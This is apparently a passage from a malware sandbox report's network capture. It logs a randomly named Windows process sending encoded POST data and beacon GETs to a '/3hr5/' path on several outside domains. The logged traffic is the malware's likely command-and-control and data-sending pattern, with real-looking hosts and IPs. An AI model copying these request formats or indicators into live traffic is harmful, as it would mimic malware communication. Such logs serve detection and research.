                                                                                                                              Dec 4, 2023 15:28:12.131697893 CET | 1035 | IN | Data Ascii: -bef4-ee065ace2136
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Download-Options: noopen
                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                              X-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              87 | 192.168.11.20 | 50218 | 23.227.38.74 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:28:14.411942005 CET | 1156 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.littlehappiez.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.littlehappiez.com
                                                                                                                              Referer: http://www.littlehappiez.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=HKr1rJzWZu/iq5ZCcYodrnB2/qAhcpqyz6E3catvOyk61Upb1DqhZDu2frXbN44iBzhZNGK7J0Do/pMkrgxvRy1KhXyGezsIjRWloSj+hFVjjP8TN7UNq9xFf8oUhVjLrOSCHv+G4/3QY/mZKExTZUWTIyX3HUQKnc4hNWOgBj12kUqYFjcXRaxwlv1LetiwYs42gAn8LRVljJN5zRa3qjDodo/YziqGq9fH1xO33LYrMewsHJpcdJE94sYvhtXdmMkoEQpRG8thpxmMmYtvAT9s2Irdq7We9pOLJMNmbluEtGmnRtSHG7+UW9tW4abkPSz+XfQ6C0wNPtFSYzRL58GKR5JDG4zur1dA8jF8upzR7TXyqnUshvtGeB97n4g2CDbq+rSzuPgLELMvoMUVJUdNdnlgiE2RZGaElzfUUz3V0XZpzhLCEmzKoGsufwB2H+o8kfKiXDaqS+Lls4Pm8Mvf/oev/jX0yyWComO5S656k576e4rtuUziG0AphXbvTIbPYhk=
                                                                                                                              Dec 4, 2023 15:28:14.682645082 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:14 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              X-Sorting-Hat-PodId: 293
                                                                                                                              X-Sorting-Hat-ShopId: 83935199526
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Frame-Options: DENY
                                                                                                                              X-ShopId: 83935199526
                                                                                                                              X-ShardId: 293
                                                                                                                              Content-Language: en-US
                                                                                                                              Set-Cookie: localization=US; path=/; expires=Wed, 04 Dec 2024 14:28:14 GMT; SameSite=Lax
                                                                                                                              Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Tue, 05 Dec 2023 14:28:14 GMT; SameSite=Lax
                                                                                                                              Set-Cookie: _shopify_y=02be2310-1102-43bf-bbf2-013301af3494; Expires=Tue, 03-Dec-24 14:28:14 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                              Set-Cookie: _shopify_s=031fab2f-5531-432f-acdb-c3e393998f7a; Expires=Mon, 04-Dec-23 14:58:14 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                              Server-Timing: processing;dur=121
                                                                                                                              X-Shopify-Stage: production
                                                                                                                              Content-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9b7230b8-28ec-4cf
                                                                                                                              Dec 4, 2023 15:28:14.682717085 CET | 1035 | IN | Data Ascii: -9352-d6f30af86b61
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Download-Options: noopen
                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                              X-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              88 | 192.168.11.20 | 50219 | 23.227.38.74 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:28:17.037573099 CET | 2626 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.littlehappiez.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.littlehappiez.com
                                                                                                                              Referer: http://www.littlehappiez.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:28:17.037766933 CET | 10342 | OUT
Dec 4, 2023 15:28:17.133529902 CET | 3912 | OUT
Dec 4, 2023 15:28:17.133620977 CET | 6484 | OUT
Dec 4, 2023 15:28:17.134033918 CET | 10342 | OUT
Dec 4, 2023 15:28:17.134335041 CET | 5198 | OUT
Dec 4, 2023 15:28:17.228692055 CET | 2626 | OUT
Dec 4, 2023 15:28:17.229779005 CET | 2626 | OUT
Dec 4, 2023 15:28:17.229922056 CET | 9829 | OUT
Dec 4, 2023 15:28:17.561101913 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:17 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              X-Sorting-Hat-PodId: 293
                                                                                                                              X-Sorting-Hat-ShopId: 83935199526
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Frame-Options: DENY
                                                                                                                              X-ShopId: 83935199526
                                                                                                                              X-ShardId: 293
                                                                                                                              Content-Language: en-US
                                                                                                                              Set-Cookie: localization=US; path=/; expires=Wed, 04 Dec 2024 14:28:17 GMT; SameSite=Lax
                                                                                                                              Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Tue, 05 Dec 2023 14:28:17 GMT; SameSite=Lax
                                                                                                                              Set-Cookie: _shopify_y=2e4bd00b-11d3-4efc-9730-41f05ece12d0; Expires=Tue, 03-Dec-24 14:28:17 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                              Set-Cookie: _shopify_s=219adf6f-de36-4280-bfaa-386c2d51f9ae; Expires=Mon, 04-Dec-23 14:58:17 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                              Server-Timing: processing;dur=161
                                                                                                                              X-Shopify-Stage: production
                                                                                                                              Content-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=031c8eb7-0c56-477
Dec 4, 2023 15:28:17.561177969 CET | 1035 | IN | -bdf4-74639fc4574f
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol
Dec 4, 2023 15:28:17.561234951 CET | 1340 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.11.20 | 50220 | 23.227.38.74 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:28:19.660556078 CET | 542 | OUT | GET /3hr5/?TZd=KIDVo8Keffnboaw8XoMrozoth4xFJ4fk1ZVbA+0ZIyIjkFdoyEHsPjmNeaT/UPsvPUpfCXSZX3H43JcvkGtZbEcm0CWLYl5Piw==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1
                                                                                                                              Host: www.littlehappiez.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:28:19.810173035 CET | 1340 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:19 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              X-Sorting-Hat-PodId: 293
                                                                                                                              X-Sorting-Hat-ShopId: 83935199526
                                                                                                                              X-Storefront-Renderer-Rendered: 1
                                                                                                                              Location: https://littlehappiez.com/3hr5?TZd=KIDVo8Keffnboaw8XoMrozoth4xFJ4fk1ZVbA+0ZIyIjkFdoyEHsPjmNeaT/UPsvPUpfCXSZX3H43JcvkGtZbEcm0CWLYl5Piw==&gpo=NNNtyBQpfR9tJN1
                                                                                                                              X-Redirect-Reason: https_required
                                                                                                                              X-Frame-Options: DENY
                                                                                                                              Content-Security-Policy: frame-ancestors 'none';
                                                                                                                              X-ShopId: 83935199526
                                                                                                                              X-ShardId: 293
                                                                                                                              Vary: Accept
                                                                                                                              powered-by: Shopify
                                                                                                                              Server-Timing: processing;dur=10;desc="gc:1", db;dur=4, asn;desc="174", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="jjff", requestID;desc="23cdd8ec-14c7-4fc8-b550-3ca0adb83c25"
                                                                                                                              X-Shopify-Stage: production
                                                                                                                              X-Dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                                                                                              X-Request-ID: 23cdd8ec-14c7-4fc8-b550-3ca0adb83c25
                                                                                                                              X-Download-Options: noopen
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p7sn8jdfKha2DWz%2BMoKeCFnT9YwFE54RmnNy86U5eXgdY0J2o8c2LRZ9gJ2HfK0a7qLwwRuG6WrCddRc%2FgL86jTpih2aDxfYRmMIxHuZrFMn
Dec 4, 2023 15:28:19.810221910 CET | 329 | IN | jj6luK6bjxEIAQ5FBk0gqYi9GNsJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server-Timing: cfRequestDuration;dur=53.999901
Server: cloudflare
CF-RAY: 8304bc373a5f1869-EWR
Dec 4, 2023 15:28:19.810254097 CET | 59 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.11.20 | 50221 | 91.195.240.19 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:28:25.186373949 CET | 822 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.engindenizyurdu.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.engindenizyurdu.com
                                                                                                                              Referer: http://www.engindenizyurdu.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=Rwz1t00NQLbjpRmUO+B54LvCB/b+5P+Nyo0ekbKjC+9OmghYajDTo7nqSb0Pv4V6wU5EGHXEhjP4H+jktP/b/xn8B2srGoc5W7Wnfzi5d8UxFffcbSCskJSpLBEOwEf2wwokVKHKJmcaBDprOOPC3CUjp7OCp30IgShfN2KScRuA9b96dQ==
Dec 4, 2023 15:28:25.369597912 CET | 353 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:28:25 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.11.20 | 50222 | 91.195.240.19 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:28:27.886938095 CET | 1162 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.engindenizyurdu.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.engindenizyurdu.com
                                                                                                                              Referer: http://www.engindenizyurdu.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:28:28.069636106 CET | 353 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:28:27 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.11.20 | 50223 | 91.195.240.19 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:28:30.590428114 CET | 6484 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.engindenizyurdu.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.engindenizyurdu.com
                                                                                                                              Referer: http://www.engindenizyurdu.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:28:30.590512037 CET | 6484 | OUT
Dec 4, 2023 15:28:30.772437096 CET | 2626 | OUT
Dec 4, 2023 15:28:30.772576094 CET | 5198 | OUT
Dec 4, 2023 15:28:30.772779942 CET | 2626 | OUT
Dec 4, 2023 15:28:30.772953033 CET | 353 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:28:30 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
Dec 4, 2023 15:28:30.772969007 CET | 5198 | OUT
Dec 4, 2023 15:28:30.773128033 CET | 6484 | OUT
Dec 4, 2023 15:28:30.773241043 CET | 3912 | OUT
Dec 4, 2023 15:28:30.954958916 CET | 2626 | OUT
Dec 4, 2023 15:28:30.955132008 CET | 2626 | OUT
Dec 4, 2023 15:28:30.955431938 CET | 3912 | OUT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.11.20 | 50224 | 91.195.240.19 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:28:33.292427063 CET | 544 | OUT | GET /3hr5/?TZd=cybVuDtLHKDYoAC8BtRtsfHHNdqM0/3VmZgYz4alBfxy2AFWbwCj5N7XVIo5x4xVvDhkEXfU/TSdDvvPnMbZ8BO8VTwNCq9LYQ==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1
                                                                                                                              Host: www.engindenizyurdu.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:28:33.560586929 CET | 1340 | IN | HTTP/1.1 200 OK
                                                                                                                              date: Mon, 04 Dec 2023 14:28:33 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              vary: Accept-Encoding
                                                                                                                              x-powered-by: PHP/8.1.17
                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              pragma: no-cache
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_TLtGuZfCLdrjO52DqbnMk6Vu01gcdxyA/mCtG+XanHCMsfvWI6N6pZKxka7u0lUC0VHAmEC4srnAdW5yeXhnhQ==
                                                                                                                              last-modified: Mon, 04 Dec 2023 14:28:33 GMT
                                                                                                                              x-cache-miss-from: parking-698fb476bf-6x2qm
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: 2EE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_TLtGuZfCLdrjO52DqbnMk6Vu01gcdxyA/mCtG+XanHCMsfvWI6N6pZKxka7u0lUC0VHAmEC4srnAdW5yeXhnhQ==><head><meta charset="utf-8"><title>engindenizyurdu.com&nbsp;-&nbsp;engindenizyurdu Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="engindenizyurdu.com is your first and best source for all of the information youre lookin
                                                                                                                              Dec 4, 2023 15:28:33.560736895 CET1340INData Raw: 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 65 6e 67 69 6e 64 65 6e
                                                                                                                              Data Ascii: g for. From general topics to more of what you would expect to find here, engindenizyurdu.com has it all. We hope you find what you are se570arching for!"><link rel="icon" type="image/png" href="//img.sedoparking.co
                                                                                                                              Dec 4, 2023 15:28:33.560800076 CET1340INData Raw: 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b
                                                                                                                              Data Ascii: oot){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-we
                                                                                                                              Dec 4, 2023 15:28:33.560862064 CET1340INData Raw: 79 3a 6e 6f 6e 65 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d
                                                                                                                              Data Ascii: y:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-bu
                                                                                                                              Dec 4, 2023 15:28:33.560935020 CET1340INData Raw: 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f
                                                                                                                              Data Ascii: container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us
                                                                                                                              Dec 4, 2023 15:28:33.561026096 CET1340INData Raw: 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f
                                                                                                                              Data Ascii: ansition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;dis
                                                                                                                              Dec 4, 2023 15:28:33.561086893 CET1340INData Raw: 64 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73
                                                                                                                              Data Ascii: d-color:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;fo
                                                                                                                              Dec 4, 2023 15:28:33.561144114 CET1340INData Raw: 72 65 6c 61 74 69 76 65 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 37 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f
                                                                                                                              Data Ascii: relative;height:100%;max-width:1700px;margin:0 auto !important}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlink
                                                                                                                              Dec 4, 2023 15:28:33.561201096 CET1340INData Raw: 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69
                                                                                                                              Data Ascii: osition-y:top}.container-content--twot .container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-y:top}.tw
                                                                                                                              Dec 4, 2023 15:28:33.561256886 CET1340INData Raw: 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f
                                                                                                                              Data Ascii: rchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-deco
                                                                                                                              Dec 4, 2023 15:28:33.742947102 CET1340INData Raw: 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 54 4c 74 47 75 5a 66 43 4c 64 72 6a 4f 35 32 44 71 62 6e 4d 6b 36 56 75 30 31 67 63 64 78 79 41 2f 6d 43 74 47 2b 58 61 6e 48 43 4d
                                                                                                                              Data Ascii: fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_TLtGuZfCLdrjO52DqbnMk6Vu01gcdxyA/mCtG+XanHCMsfvWI6N6pZKxka7u0lUC0VHAmEC4srnAdW5yeXhnhQ==","tid":3199,"buybox":false,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbo570x":true,"noFollow":f


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              94 | 192.168.11.20 | 50225 | 91.184.0.200 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:28:39.281903028 CET | 828 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.opleverdossier.online
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.opleverdossier.online
                                                                                                                              Referer: http://www.opleverdossier.online/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
